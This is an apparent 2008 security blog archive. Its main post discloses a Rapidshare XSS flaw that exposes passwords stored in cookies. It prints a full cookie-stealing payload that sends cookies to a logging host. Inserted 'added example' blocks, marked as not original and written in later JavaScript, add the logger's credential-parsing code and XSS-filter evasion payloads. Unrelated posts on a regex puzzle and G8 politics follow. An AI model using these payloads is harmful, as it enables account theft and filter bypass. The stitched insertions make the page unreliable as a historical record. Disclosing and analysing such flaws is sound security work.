Archive for July, 2008

You know, looks like the Firefox Summit 2008 is going to have a dramatic epilogue.
I've been sitting next to AdBlock Plus' author all this afternoon, attending a couple of security-related sessions, and now I'm getting dangerously hungry...
Want to save your favourite adblocker? Try to file a bug depending on this one.

As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it was reported to the site owners.
But what can you expect from people who store both your username and your password inside your cookie?
Yes, check it yourself: a Rapidshare cookie looks like

user=12345-%36%37%38%39%30

i.e. the numeric login, a dash, and the password with every character replaced by "%" followed by its character code in hex.
In JavaScript, the site builds it as

var cookie = "user=" + login + "-" + pwd.replace(/./g, function (s) {
  // each password character becomes "%" followed by its char code in hex
  return "%" + s.charCodeAt(0).toString(16);
});

Therefore, for a given cookie, access credentials are just

var [login, pwd] = cookie.replace(/.*=/, '').split("-"); // drop the cookie name, split login from password
pwd = unescape(pwd); // undo the %XX escaping

This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink:

// payload reflected by the vulnerable page: a script that ships the victim's
// cookie (i.e. login and password) to a logging host
var injection = "<script>(" + (function() {
  new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
    escape(document.cookie);
}) + ")()</scr" + "ipt>";
// hidden frame loading the vulnerable Rapidshare page with the payload injected
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
  encodeURIComponent(injection);
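As an added example (not part of the original post, and not Rapidshare's code), here is the receiving end of the scheme above: what a logging endpoint has to do with the `?c=` parameter the injected script sends, together with a mirror of the cookie encoder so the round trip can be checked offline. The cookie layout (`user=<login>-<%XX-escaped password>`) is the one described above; the sample login and password are made up, and the encoder pads char codes to two hex digits, which the original does not. The legacy `escape`/`unescape` pair is used deliberately because that is what the injected script uses.

```javascript
// Added example, not the original post's code. Cookie layout as described
// above: user=<login>-<password with each char as %XX>. Sample values are
// constructed.

// Mirror of the encoder the post infers from the cookie. The hex is padded
// to two digits here (the original's toString(16) leaves codes < 0x10 short).
function encodeRapidshareCookie(login, pwd) {
  const hex = pwd.replace(/./g, (s) => "%" + s.charCodeAt(0).toString(16).padStart(2, "0"));
  return "user=" + login + "-" + hex;
}

// Turn "a=b; user=12345-%36%37; c=d" into { a: "b", user: "12345-%36%37", c: "d" }.
function parseCookieHeader(cookieString) {
  const jar = {};
  for (const part of cookieString.split(/;\s*/)) {
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    jar[part.slice(0, eq)] = part.slice(eq + 1);
  }
  return jar;
}

// Recover login and password from the "user" cookie. Split on the first dash
// only: the encoded password is made of %XX sequences, so everything after the
// first dash belongs to it.
function credentialsFromCookie(cookieString) {
  const user = parseCookieHeader(cookieString).user;
  if (!user) return null;
  const dash = user.indexOf("-");
  if (dash < 0) return null;
  return { login: user.slice(0, dash), pwd: unescape(user.slice(dash + 1)) };
}

// What the logger receives: the injected script sent escape(document.cookie)
// as the value of the "c" query parameter.
function credentialsFromLoggerQuery(requestPath) {
  const m = /(?:^|[?&])c=([^&]*)/.exec(requestPath);
  if (!m) return null;
  return credentialsFromCookie(unescape(m[1]));
}

// Constructed sample: a second, unrelated cookie sits in front of the "user" one.
const sampleCookie = "lang=en; " + encodeRapidshareCookie("12345", "s3cr3t-pw");
const sampleRequest = "/cookielogger/rapidshare/?c=" + escape(sampleCookie);
console.log(credentialsFromLoggerQuery(sampleRequest)); // { login: '12345', pwd: 's3cr3t-pw' }
```

The point of the round trip is that nothing on the attacker's side needs to be guessed: the cookie is the credential, reversibly encoded, so a single cookie leak is a password leak.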

But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites... ;)

Update

Fixed on 6 Aug 2008.

OK, Dustin Diaz (via Paul O’Shannessy) managed to delay my lunch by 30 secs.

var arr = ['a', 'b', 'c', 'c', 'd','e', 'e',
'e', 'e', 'e', 'f', 'e', 'f', 'e',
'f', 'a', 'a', 'a', 'f', 'f', 'f'];
var solution='a b c c d e e <span>e e e</span> f e f e f a a <span>a</span> f f <span>f</span>';
// wrap every repetition beyond the second of a run of identical letters in a <span>
var won = arr.join(' ').replace(/((\w)\s\2\s)((?:\2\s?)+)(?=\s|$)/g, '$1<span>$3</span>') == solution;

Thanks to the wonderful interactive environment of Firefox's "Error Console" (formerly known as JavaScript Console), my pasta didn't get too cold :)

So the Hokkaido G8 has food security, climate change and oil prices in a prominent place on its agenda.

Bush has made accountability a major theme for this year's G8 meetings, arguing that "we need people who not only make promises, but write checks, for the sake of human rights and human dignity, and for the sake of peace." The G8 includes Britain, Canada, France, Germany, Italy, Japan, Russia and the United States.

G8 leaders are expected to address an array of political, security and economic issues when they meet for three days. "We expect that they will discuss a broad range of issues, including development, Africa, food security, trade and investment policy, energy security, climate change and issues relating to the global economy, including oil prices."

Obviously, we expect the very same people who became insanely rich thanks to these "issues" [1] to clean up their profitable mess and save the world.

We expect politicians whose career and position is entirely built upon terror to fight it.
We expect governments driven by ruthless corporate interests to regulate for a planet-sustainable economy, which may require profit margin reductions or even degrowth [2].
We expect oil companies, mercenary armies, reconstruction contractors and weapon manufacturers, which, rather than bribing the people's elected representatives as they used to in the past, nowadays have their executives placed directly in key government roles as an obscene parody of democracy, to shoot themselves in the foot.

Just like expecting anti-virus vendors to push technologies and approaches making our information systems really safer, or Microsoft to promote open (web) standards...

Notes

[1] An interesting and very well documented paper titled Who benefits from GM crops: the rise in pesticide use explains clearly how technologies advertised as a remedy against world hunger are, in reality, making the problem far worse.

[2] The linked article is the first Google Search result in English for "Degrowth", and likely a good introductory resource. While both Italian and French Wikipedia sites have articles about this topic, I could not find anything on the English site. Why?

I'm happy to learn that IE8 is going to implement a less ambitious version of a feature which NoScript users have enjoyed for more than one year now. The announcement posts seem not to notice the resemblance between "XSS Filter" and NoScript's Anti-XSS Protection, the most striking being their non-blocking approach: loading the target page in a "neutralized" form and emitting a warning as an info-bar, which doesn't require interaction and therefore doesn't necessarily interrupt the user's workflow. But that's fine: in fact, under the hood, their filter looks rather less sophisticated than NoScript's InjectionChecker engine, as it is based on a limited blacklist, apparently targeted at the most common reflected XSS attack patterns as seen in proofs of concept:

The XSS Filter defends against the most common XSS attacks but it is not, and will never be, an XSS panacea. [...]
The fact that our filter effectively blocks the common "><script>"… pattern we see most frequently in Type-1 XSS attacks is inherently a step forward. Pushing that further and blocking other common cases of reflected XSS where possible, as the XSS Filter does, is extra goodness.
Caveats aside, it will be great to see the tens of thousands of publicly disclosed Type-1 XSS vulnerabilities indexed on sites like XSSed.com simply stop working in IE8.

And there I started smiling: you realize, guys, that those listed "on sites like XSSed.com" are not "XSS vulnerabilities" which will "stop working in IE8", but just minimal exploit test cases --

<script>alert("XSS")</script>

-- which can be refactored and obfuscated in endless ways to obtain the "IE8 compatible" certification. Yeah, it will be great to see.
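To make the objection concrete, here is an added example (mine, not IE8's filter and not NoScript's InjectionChecker): a toy reflected-XSS blacklist built around the one pattern the announcement names, `"><script>`, applied IE8-style by breaking the token rather than blocking the page, next to a few trivial rewrites of the XSSed-style test case that carry the same injection without that exact byte sequence. The rule set, the "still executable" heuristic and the payload list are all constructed for this illustration; the broader rule at the end shows that widening the blacklist just moves the problem.

```javascript
// Added example, not IE8's or NoScript's code. A blacklist modelled on the
// single pattern quoted above, and payloads that sidestep it. All rules and
// payloads below are constructed for illustration.

// The blacklist: one pattern, neutralised by breaking the token in place
// (the "load the page in a neutralized form" approach) instead of blocking.
const BLACKLIST = [/"><script>/g];

function neutralize(urlParam, rules = BLACKLIST) {
  let out = urlParam;
  for (const rule of rules) {
    out = out.replace(rule, (m) => m.replace(/script/i, "sc#ript"));
  }
  return out;
}

// "Attack survives" here means: after filtering, the reflected text still
// contains an intact opening <script> tag or an intact inline event handler.
// (A real check would parse HTML; this heuristic is enough for the point.)
const SCRIPT_TAG = /<script\b[^>]*>/i;
const EVENT_HANDLER = /\bon[a-z]+\s*=/i;
function stillExecutable(html) {
  return SCRIPT_TAG.test(html) || EVENT_HANDLER.test(html);
}

// Constructed test cases: the PoC string as listed on sites like XSSed.com,
// then three one-character-class rewrites of it.
const PAYLOADS = {
  canonical:  '"><script>alert("XSS")</script>',
  caseChange: '"><ScRiPt>alert("XSS")</ScRiPt>',
  extraSpace: '"> <script>alert("XSS")</script>',
  noTagAtAll: '"><img src=x onerror=alert("XSS")>',
};

// Run every payload through the filter and report which ones still execute.
function evaluate(rules = BLACKLIST) {
  const report = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    report[name] = stillExecutable(neutralize(payload, rules));
  }
  return report;
}

// A broader blacklist: any <script tag, any case, regardless of what precedes it.
// It catches the tag-based rewrites and still misses the event-handler one.
const BROADER = [/<script\b/gi];

console.log(evaluate());        // only "canonical" is stopped
console.log(evaluate(BROADER)); // "noTagAtAll" still gets through
```

The lesson is the one the post makes: a blacklist certifies that the listed proof-of-concept strings no longer work, not that the underlying vulnerability is gone, because the attacker chooses the encoding and the tag.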

Anyway, such a feature being deployed as a built-in of a popular browser, rather than as an add-on for an awesome browser, will likely keep script kiddies busy for a while, maybe taking a filter evasion crash course. I just hope it won't give some site owners an alibi not to fix their bugs, though, putting a "This site is best viewed with IE8" badge next to their McAfee Hackersafe logo.

Final thought: echoing the news on his blog, RSnake swiftly mentioned NoScript (thanks), but at the end of that post, calling for adoption of his own bright Content Restrictions idea, he forgot to say that one (experimental) implementation already exists... Do these cross-site scripting filters suppress legitimate cross-site references as well? ;)
